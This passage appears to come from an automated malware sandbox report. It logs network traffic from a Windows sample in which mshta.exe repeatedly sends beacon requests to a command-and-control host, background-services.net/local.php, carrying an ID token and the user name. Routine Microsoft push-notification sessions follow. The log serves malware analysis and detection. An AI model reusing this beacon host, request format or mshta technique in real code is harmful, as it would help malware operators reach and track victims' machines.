                        Data Ascii: Vn:DRu=x38ihW9~necKRU$R`gR-m;W+v>WVW!g]D,{s$WH7HCRkVi<oIr?'%@Fmg-pZt~vXL!n[Fl[4+\m~e;&bx/o)(!a^>85lBw3G5I`-DsU`|ns)+vb8['8a2&D9ev@G7<!~d%#%1*xFf7kENx_!3QtUD811AB#Ak7|yF7{T{)qJdL{CgKG=**VEd`0)&,egTBZ=?VCjMb=z"EZb0hl%t-4lSw U)>|1_wBQuL/OgBS;w\\M12tLXZ3SB^y<cT11,L`QV;TU0_iGC$9"$Gce8N]D&VeUhK);'`8>{QW}0{hc\vJAheGO~-\`(Z##,z1=?J]34o#5f.0zc2M}eNFeAKHbffRxe
                        Jan 13, 2025 21:33:51.412499905 CET269OUTPUT /local.php HTTP/1.1
                        Accept: */*
                        Content-type: application/json
                        User-Agent: 061544 user
                        Accept-Language: en-ch
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        Host: background-services.net
                        Content-Length: 69
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Jan 13, 2025 21:33:51.412691116 CET69OUTData Raw: 7b 22 6f 6b 61 6b 73 6f 66 6b 61 69 22 3a 22 70 69 7a 66 67 67 4c 50 77 71 31 4f 32 51 77 66 34 58 34 76 46 63 67 32 22 2c 22 78 6f 73 6b 64 6b 73 69 6f 73 22 3a 22 30 36 31 35 34 34 20 47 61 6e 6a 69 22 7d
                        Data Ascii: {"okaksofkai":"pizfggLPwq1O2Qwf4X4vFcg2","xoskdksios":"061544 user"}
                        Jan 13, 2025 21:33:51.743153095 CET186INHTTP/1.1 200 OK
                        Date: Mon, 13 Jan 2025 20:33:51 GMT
                        Server: Apache
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=utf-8


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.26592422.58.15.158801460C:\Windows\System32\mshta.exe
                        TimestampBytes transferredDirectionData
                        Jan 13, 2025 21:34:23.750430107 CET269OUTPUT /local.php HTTP/1.1
                        Accept: */*
                        Content-type: application/json
                        User-Agent: 061544 user
                        Accept-Language: en-ch
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        Host: background-services.net
                        Content-Length: 69
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Jan 13, 2025 21:34:23.751080990 CET69OUTData Raw: 7b 22 6f 6b 61 6b 73 6f 66 6b 61 69 22 3a 22 70 69 7a 66 67 67 4c 50 77 71 31 4f 32 51 77 66 34 58 34 76 46 63 67 32 22 2c 22 78 6f 73 6b 64 6b 73 69 6f 73 22 3a 22 30 36 31 35 34 34 20 47 61 6e 6a 69 22 7d
                        Data Ascii: {"okaksofkai":"pizfggLPwq1O2Qwf4X4vFcg2","xoskdksios":"061544 user"}
                        Jan 13, 2025 21:34:24.342899084 CET187INHTTP/1.1 200 OK
                        Date: Mon, 13 Jan 2025 20:34:24 GMT
                        Server: Apache
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=utf-8


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.26592432.58.15.158801460C:\Windows\System32\mshta.exe
                        TimestampBytes transferredDirectionData
                        Jan 13, 2025 21:34:53.386176109 CET269OUTPUT /local.php HTTP/1.1
                        Accept: */*
                        Content-type: application/json
                        User-Agent: 061544 user
                        Accept-Language: en-ch
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        Host: background-services.net
                        Content-Length: 69
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Jan 13, 2025 21:34:53.386368990 CET69OUTData Raw: 7b 22 6f 6b 61 6b 73 6f 66 6b 61 69 22 3a 22 70 69 7a 66 67 67 4c 50 77 71 31 4f 32 51 77 66 34 58 34 76 46 63 67 32 22 2c 22 78 6f 73 6b 64 6b 73 69 6f 73 22 3a 22 30 36 31 35 34 34 20 47 61 6e 6a 69 22 7d
                        Data Ascii: {"okaksofkai":"pizfggLPwq1O2Qwf4X4vFcg2","xoskdksios":"061544 user"}
                        Jan 13, 2025 21:34:53.983913898 CET187INHTTP/1.1 200 OK
                        Date: Mon, 13 Jan 2025 20:34:53 GMT
                        Server: Apache
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=utf-8


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.26592482.58.15.158801460C:\Windows\System32\mshta.exe
                        TimestampBytes transferredDirectionData
                        Jan 13, 2025 21:35:22.960267067 CET269OUTPUT /local.php HTTP/1.1
                        Accept: */*
                        Content-type: application/json
                        User-Agent: 061544 user
                        Accept-Language: en-ch
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        Host: background-services.net
                        Content-Length: 69
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Jan 13, 2025 21:35:22.960386038 CET69OUTData Raw: 7b 22 6f 6b 61 6b 73 6f 66 6b 61 69 22 3a 22 70 69 7a 66 67 67 4c 50 77 71 31 4f 32 51 77 66 34 58 34 76 46 63 67 32 22 2c 22 78 6f 73 6b 64 6b 73 69 6f 73 22 3a 22 30 36 31 35 34 34 20 47 61 6e 6a 69 22 7d
                        Data Ascii: {"okaksofkai":"pizfggLPwq1O2Qwf4X4vFcg2","xoskdksios":"061544 user"}
                        Jan 13, 2025 21:35:23.582191944 CET187INHTTP/1.1 200 OK
                        Date: Mon, 13 Jan 2025 20:35:23 GMT
                        Server: Apache
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=utf-8


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.26592532.58.15.158801460C:\Windows\System32\mshta.exe
                        TimestampBytes transferredDirectionData
                        Jan 13, 2025 21:35:49.105818987 CET269OUTPUT /local.php HTTP/1.1
                        Accept: */*
                        Content-type: application/json
                        User-Agent: 061544 user
                        Accept-Language: en-ch
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        Host: background-services.net
                        Content-Length: 69
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Jan 13, 2025 21:35:49.105992079 CET69OUTData Raw: 7b 22 6f 6b 61 6b 73 6f 66 6b 61 69 22 3a 22 70 69 7a 66 67 67 4c 50 77 71 31 4f 32 51 77 66 34 58 34 76 46 63 67 32 22 2c 22 78 6f 73 6b 64 6b 73 69 6f 73 22 3a 22 30 36 31 35 34 34 20 47 61 6e 6a 69 22 7d
                        Data Ascii: {"okaksofkai":"pizfggLPwq1O2Qwf4X4vFcg2","xoskdksios":"061544 user"}
                        Jan 13, 2025 21:35:49.730720043 CET187INHTTP/1.1 200 OK
                        Date: Mon, 13 Jan 2025 20:35:49 GMT
                        Server: Apache
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=utf-8


                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination Port
                        0192.168.2.265924440.115.3.253443
                        TimestampBytes transferredDirectionData
                        2025-01-13 20:35:19 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 31 36 0d 0a 4d 53 2d 43 56 3a 20 35 47 57 54 6e 4b 65 78 4c 55 71 51 6d 56 57 48 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 34 38 65 61 65 64 37 35 31 37 31 62 38 64 66 0d 0a 0d 0a
                        Data Ascii: CNT 1 CON 316MS-CV: 5GWTnKexLUqQmVWH.1Context: c48eaed75171b8df
                        2025-01-13 20:35:19 UTC260OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 32 32 36 33 31 2e 34 31 36 39 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 30 30 31 38 43 30 30 46 36 36 31 46 32 32 45 32 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e
                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.22631.4169</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>0018C00F661F22E2</deviceName><followRetry>true</followRetry></agent></con
                        2025-01-13 20:35:19 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 35 47 57 54 6e 4b 65 78 4c 55 71 51 6d 56 57 48 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 34 38 65 61 65 64 37 35 31 37 31 62 38 64 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 6e 50 69 47 33 71 34 48 65 6f 45 4e 49 47 71 68 70 77 78 31 43 6c 34 31 6b 33 32 47 43 75 73 73 71 6f 34 4e 64 4b 6e 4c 41 65 63 69 32 35 74 44 79 46 4b 70 6e 52 6f 72 54 47 77 59 4d 66 59 54 36 72 2b 69 34 6b 70 56 68 57 73 63 46 63 75 39 6e 41 73 39 6c 4b 35 63 55 6b 4b 37 4b 73 39 43 4f 77 41 6b 2f 39 4f 62 35 6f 50 4b
                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 5GWTnKexLUqQmVWH.2Context: c48eaed75171b8df<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAanPiG3q4HeoENIGqhpwx1Cl41k32GCussqo4NdKnLAeci25tDyFKpnRorTGwYMfYT6r+i4kpVhWscFcu9nAs9lK5cUkK7Ks9COwAk/9Ob5oPK
                        2025-01-13 20:35:19 UTC224OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 31 30 34 34 34 37 38 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 35 47 57 54 6e 4b 65 78 4c 55 71 51 6d 56 57 48 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 34 38 65 61 65 64 37 35 31 37 31 62 38 64 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                        Data Ascii: BND 3 CON\WNS 1044478 197MS-CV: 5GWTnKexLUqQmVWH.3Context: c48eaed75171b8df<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                        2025-01-13 20:35:19 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                        Data Ascii: 202 1 CON 58
                        2025-01-13 20:35:19 UTC58INData Raw: 4d 53 2d 43 56 3a 20 35 35 4f 30 77 4b 34 4d 6b 30 71 49 4c 77 53 61 58 65 4a 78 61 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                        Data Ascii: MS-CV: 55O0wK4Mk0qILwSaXeJxag.0Payload parsing failed.


                        Session IDSource IPSource PortDestination IPDestination Port
                        1192.168.2.265924640.115.3.253443
                        TimestampBytes transferredDirectionData
                        2025-01-13 20:35:22 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 31 36 0d 0a 4d 53 2d 43 56 3a 20 67 76 4c 64 47 4e 69 64 77 30 4b 4e 69 32 76 69 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 61 37 66 37 33 65 66 30 61 63 37 61 37 37 36 0d 0a 0d 0a
                        Data Ascii: CNT 1 CON 316MS-CV: gvLdGNidw0KNi2vi.1Context: fa7f73ef0ac7a776
                        2025-01-13 20:35:22 UTC260OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 32 32 36 33 31 2e 34 31 36 39 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 30 30 31 38 43 30 30 46 36 36 31 46 32 32 45 32 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e
                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.22631.4169</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>0018C00F661F22E2</deviceName><followRetry>true</followRetry></agent></con
                        2025-01-13 20:35:22 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 67 76 4c 64 47 4e 69 64 77 30 4b 4e 69 32 76 69 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 61 37 66 37 33 65 66 30 61 63 37 61 37 37 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 79 52 39 56 51 32 6a 47 51 62 4d 75 73 6f 37 37 38 6b 7a 37 2b 57 53 73 65 34 48 75 46 77 72 69 53 46 36 30 30 4c 75 4e 45 6c 2f 31 4f 2b 39 43 54 73 75 70 44 48 4f 6d 61 53 6d 62 69 75 57 67 78 35 70 2f 57 31 59 50 67 79 42 4c 62 61 43 36 44 44 4d 44 75 6a 69 6f 73 65 59 4f 78 56 6c 52 78 43 6c 79 4d 6b 74 69 45 32 4f 6d
                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: gvLdGNidw0KNi2vi.2Context: fa7f73ef0ac7a776<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARyR9VQ2jGQbMuso778kz7+WSse4HuFwriSF600LuNEl/1O+9CTsupDHOmaSmbiuWgx5p/W1YPgyBLbaC6DDMDujioseYOxVlRxClyMktiE2Om
                        2025-01-13 20:35:22 UTC224OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 31 30 34 34 34 37 38 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 67 76 4c 64 47 4e 69 64 77 30 4b 4e 69 32 76 69 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 61 37 66 37 33 65 66 30 61 63 37 61 37 37 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                        Data Ascii: BND 3 CON\WNS 1044478 197MS-CV: gvLdGNidw0KNi2vi.3Context: fa7f73ef0ac7a776<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                        2025-01-13 20:35:22 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                        Data Ascii: 202 1 CON 58
                        2025-01-13 20:35:22 UTC58INData Raw: 4d 53 2d 43 56 3a 20 57 31 6b 4a 69 76 2b 35 75 55 43 61 46 35 45 66 34 69 47 61 72 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                        Data Ascii: MS-CV: W1kJiv+5uUCaF5Ef4iGarg.0Payload parsing failed.


                        Session IDSource IPSource PortDestination IPDestination Port
                        2192.168.2.265924940.115.3.253443
                        TimestampBytes transferredDirectionData
                        2025-01-13 20:35:30 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 31 36 0d 0a 4d 53 2d 43 56 3a 20 75 50 65 59 51 38 47 62 36 30 4f 38 66 78 46 42 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 38 65 38 32 61 37 37 37 66 30 37 62 63 34 36 0d 0a 0d 0a
                        Data Ascii: CNT 1 CON 316MS-CV: uPeYQ8Gb60O8fxFB.1Context: c8e82a777f07bc46
                        2025-01-13 20:35:30 UTC260OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 32 32 36 33 31 2e 34 31 36 39 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 30 30 31 38 43 30 30 46 36 36 31 46 32 32 45 32 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e
                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.22631.4169</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>0018C00F661F22E2</deviceName><followRetry>true</followRetry></agent></con
                        2025-01-13 20:35:30 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 75 50 65 59 51 38 47 62 36 30 4f 38 66 78 46 42 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 38 65 38 32 61 37 37 37 66 30 37 62 63 34 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 50 53 58 75 39 6a 31 63 79 66 7a 51 51 46 52 41 76 39 64 46 76 49 39 43 68 6a 57 53 50 37 78 77 38 51 79 75 48 68 50 65 6d 51 35 78 72 64 57 75 4a 73 66 72 64 67 5a 61 42 63 43 71 4c 46 46 46 78 72 5a 6e 69 34 4c 4b 38 47 6b 63 73 44 53 55 70 6f 2f 73 51 39 71 4e 30 6a 75 42 31 6b 62 52 38 6c 32 46 72 2f 53 31 63 51 33 5a
                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: uPeYQ8Gb60O8fxFB.2Context: c8e82a777f07bc46<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWPSXu9j1cyfzQQFRAv9dFvI9ChjWSP7xw8QyuHhPemQ5xrdWuJsfrdgZaBcCqLFFFxrZni4LK8GkcsDSUpo/sQ9qN0juB1kbR8l2Fr/S1cQ3Z
                        2025-01-13 20:35:30 UTC224OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 31 30 34 34 34 37 38 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 75 50 65 59 51 38 47 62 36 30 4f 38 66 78 46 42 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 38 65 38 32 61 37 37 37 66 30 37 62 63 34 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                        Data Ascii: BND 3 CON\WNS 1044478 197MS-CV: uPeYQ8Gb60O8fxFB.3Context: c8e82a777f07bc46<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                        2025-01-13 20:35:31 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                        Data Ascii: 202 1 CON 58
                        2025-01-13 20:35:31 UTC58INData Raw: 4d 53 2d 43 56 3a 20 62 33 45 46 6b 72 4b 32 57 55 47 4b 50 73 53 30 74 78 42 78 68 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                        Data Ascii: MS-CV: b3EFkrK2WUGKPsS0txBxhg.0Payload parsing failed.


                        Session IDSource IPSource PortDestination IPDestination Port
                        3192.168.2.265925140.115.3.253443
                        TimestampBytes transferredDirectionData
                        2025-01-13 20:35:43 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 31 36 0d 0a 4d 53 2d 43 56 3a 20 6c 58 32 76 4a 50 4b 44 39 30 47 57 38 49 76 52 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 32 61 63 62 35 38 30 35 66 31 38 61 32 31 66 0d 0a 0d 0a
                        Data Ascii: CNT 1 CON 316MS-CV: lX2vJPKD90GW8IvR.1Context: b2acb5805f18a21f
                        2025-01-13 20:35:43 UTC260OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 32 32 36 33 31 2e 34 31 36 39 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 30 30 31 38 43 30 30 46 36 36 31 46 32 32 45 32 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e
                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.22631.4169</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>0018C00F661F22E2</deviceName><followRetry>true</followRetry></agent></con
                        2025-01-13 20:35:43 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6c 58 32 76 4a 50 4b 44 39 30 47 57 38 49 76 52 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 32 61 63 62 35 38 30 35 66 31 38 61 32 31 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 6d 78 56 58 68 34 6a 63 6c 76 54 51 42 6d 6b 56 45 61 75 65 37 45 79 78 56 4d 49 52 45 36 77 32 33 46 44 50 44 4d 55 6b 70 47 36 76 30 63 70 78 5a 43 41 48 51 6b 46 47 7a 7a 51 2b 2f 67 51 35 67 34 44 76 34 61 42 2b 66 4f 4f 6d 70 45 45 7a 65 76 58 47 58 6d 35 64 53 63 69 55 6a 6f 43 2f 58 30 46 7a 4a 4c 45 64 68 58 4f 71
                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: lX2vJPKD90GW8IvR.2Context: b2acb5805f18a21f<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAamxVXh4jclvTQBmkVEaue7EyxVMIRE6w23FDPDMUkpG6v0cpxZCAHQkFGzzQ+/gQ5g4Dv4aB+fOOmpEEzevXGXm5dSciUjoC/X0FzJLEdhXOq
                        2025-01-13 20:35:43 UTC224OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 31 30 34 34 34 37 38 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6c 58 32 76 4a 50 4b 44 39 30 47 57 38 49 76 52 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 32 61 63 62 35 38 30 35 66 31 38 61 32 31 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                        Data Ascii: BND 3 CON\WNS 1044478 197MS-CV: lX2vJPKD90GW8IvR.3Context: b2acb5805f18a21f<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                        2025-01-13 20:35:44 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                        Data Ascii: 202 1 CON 58
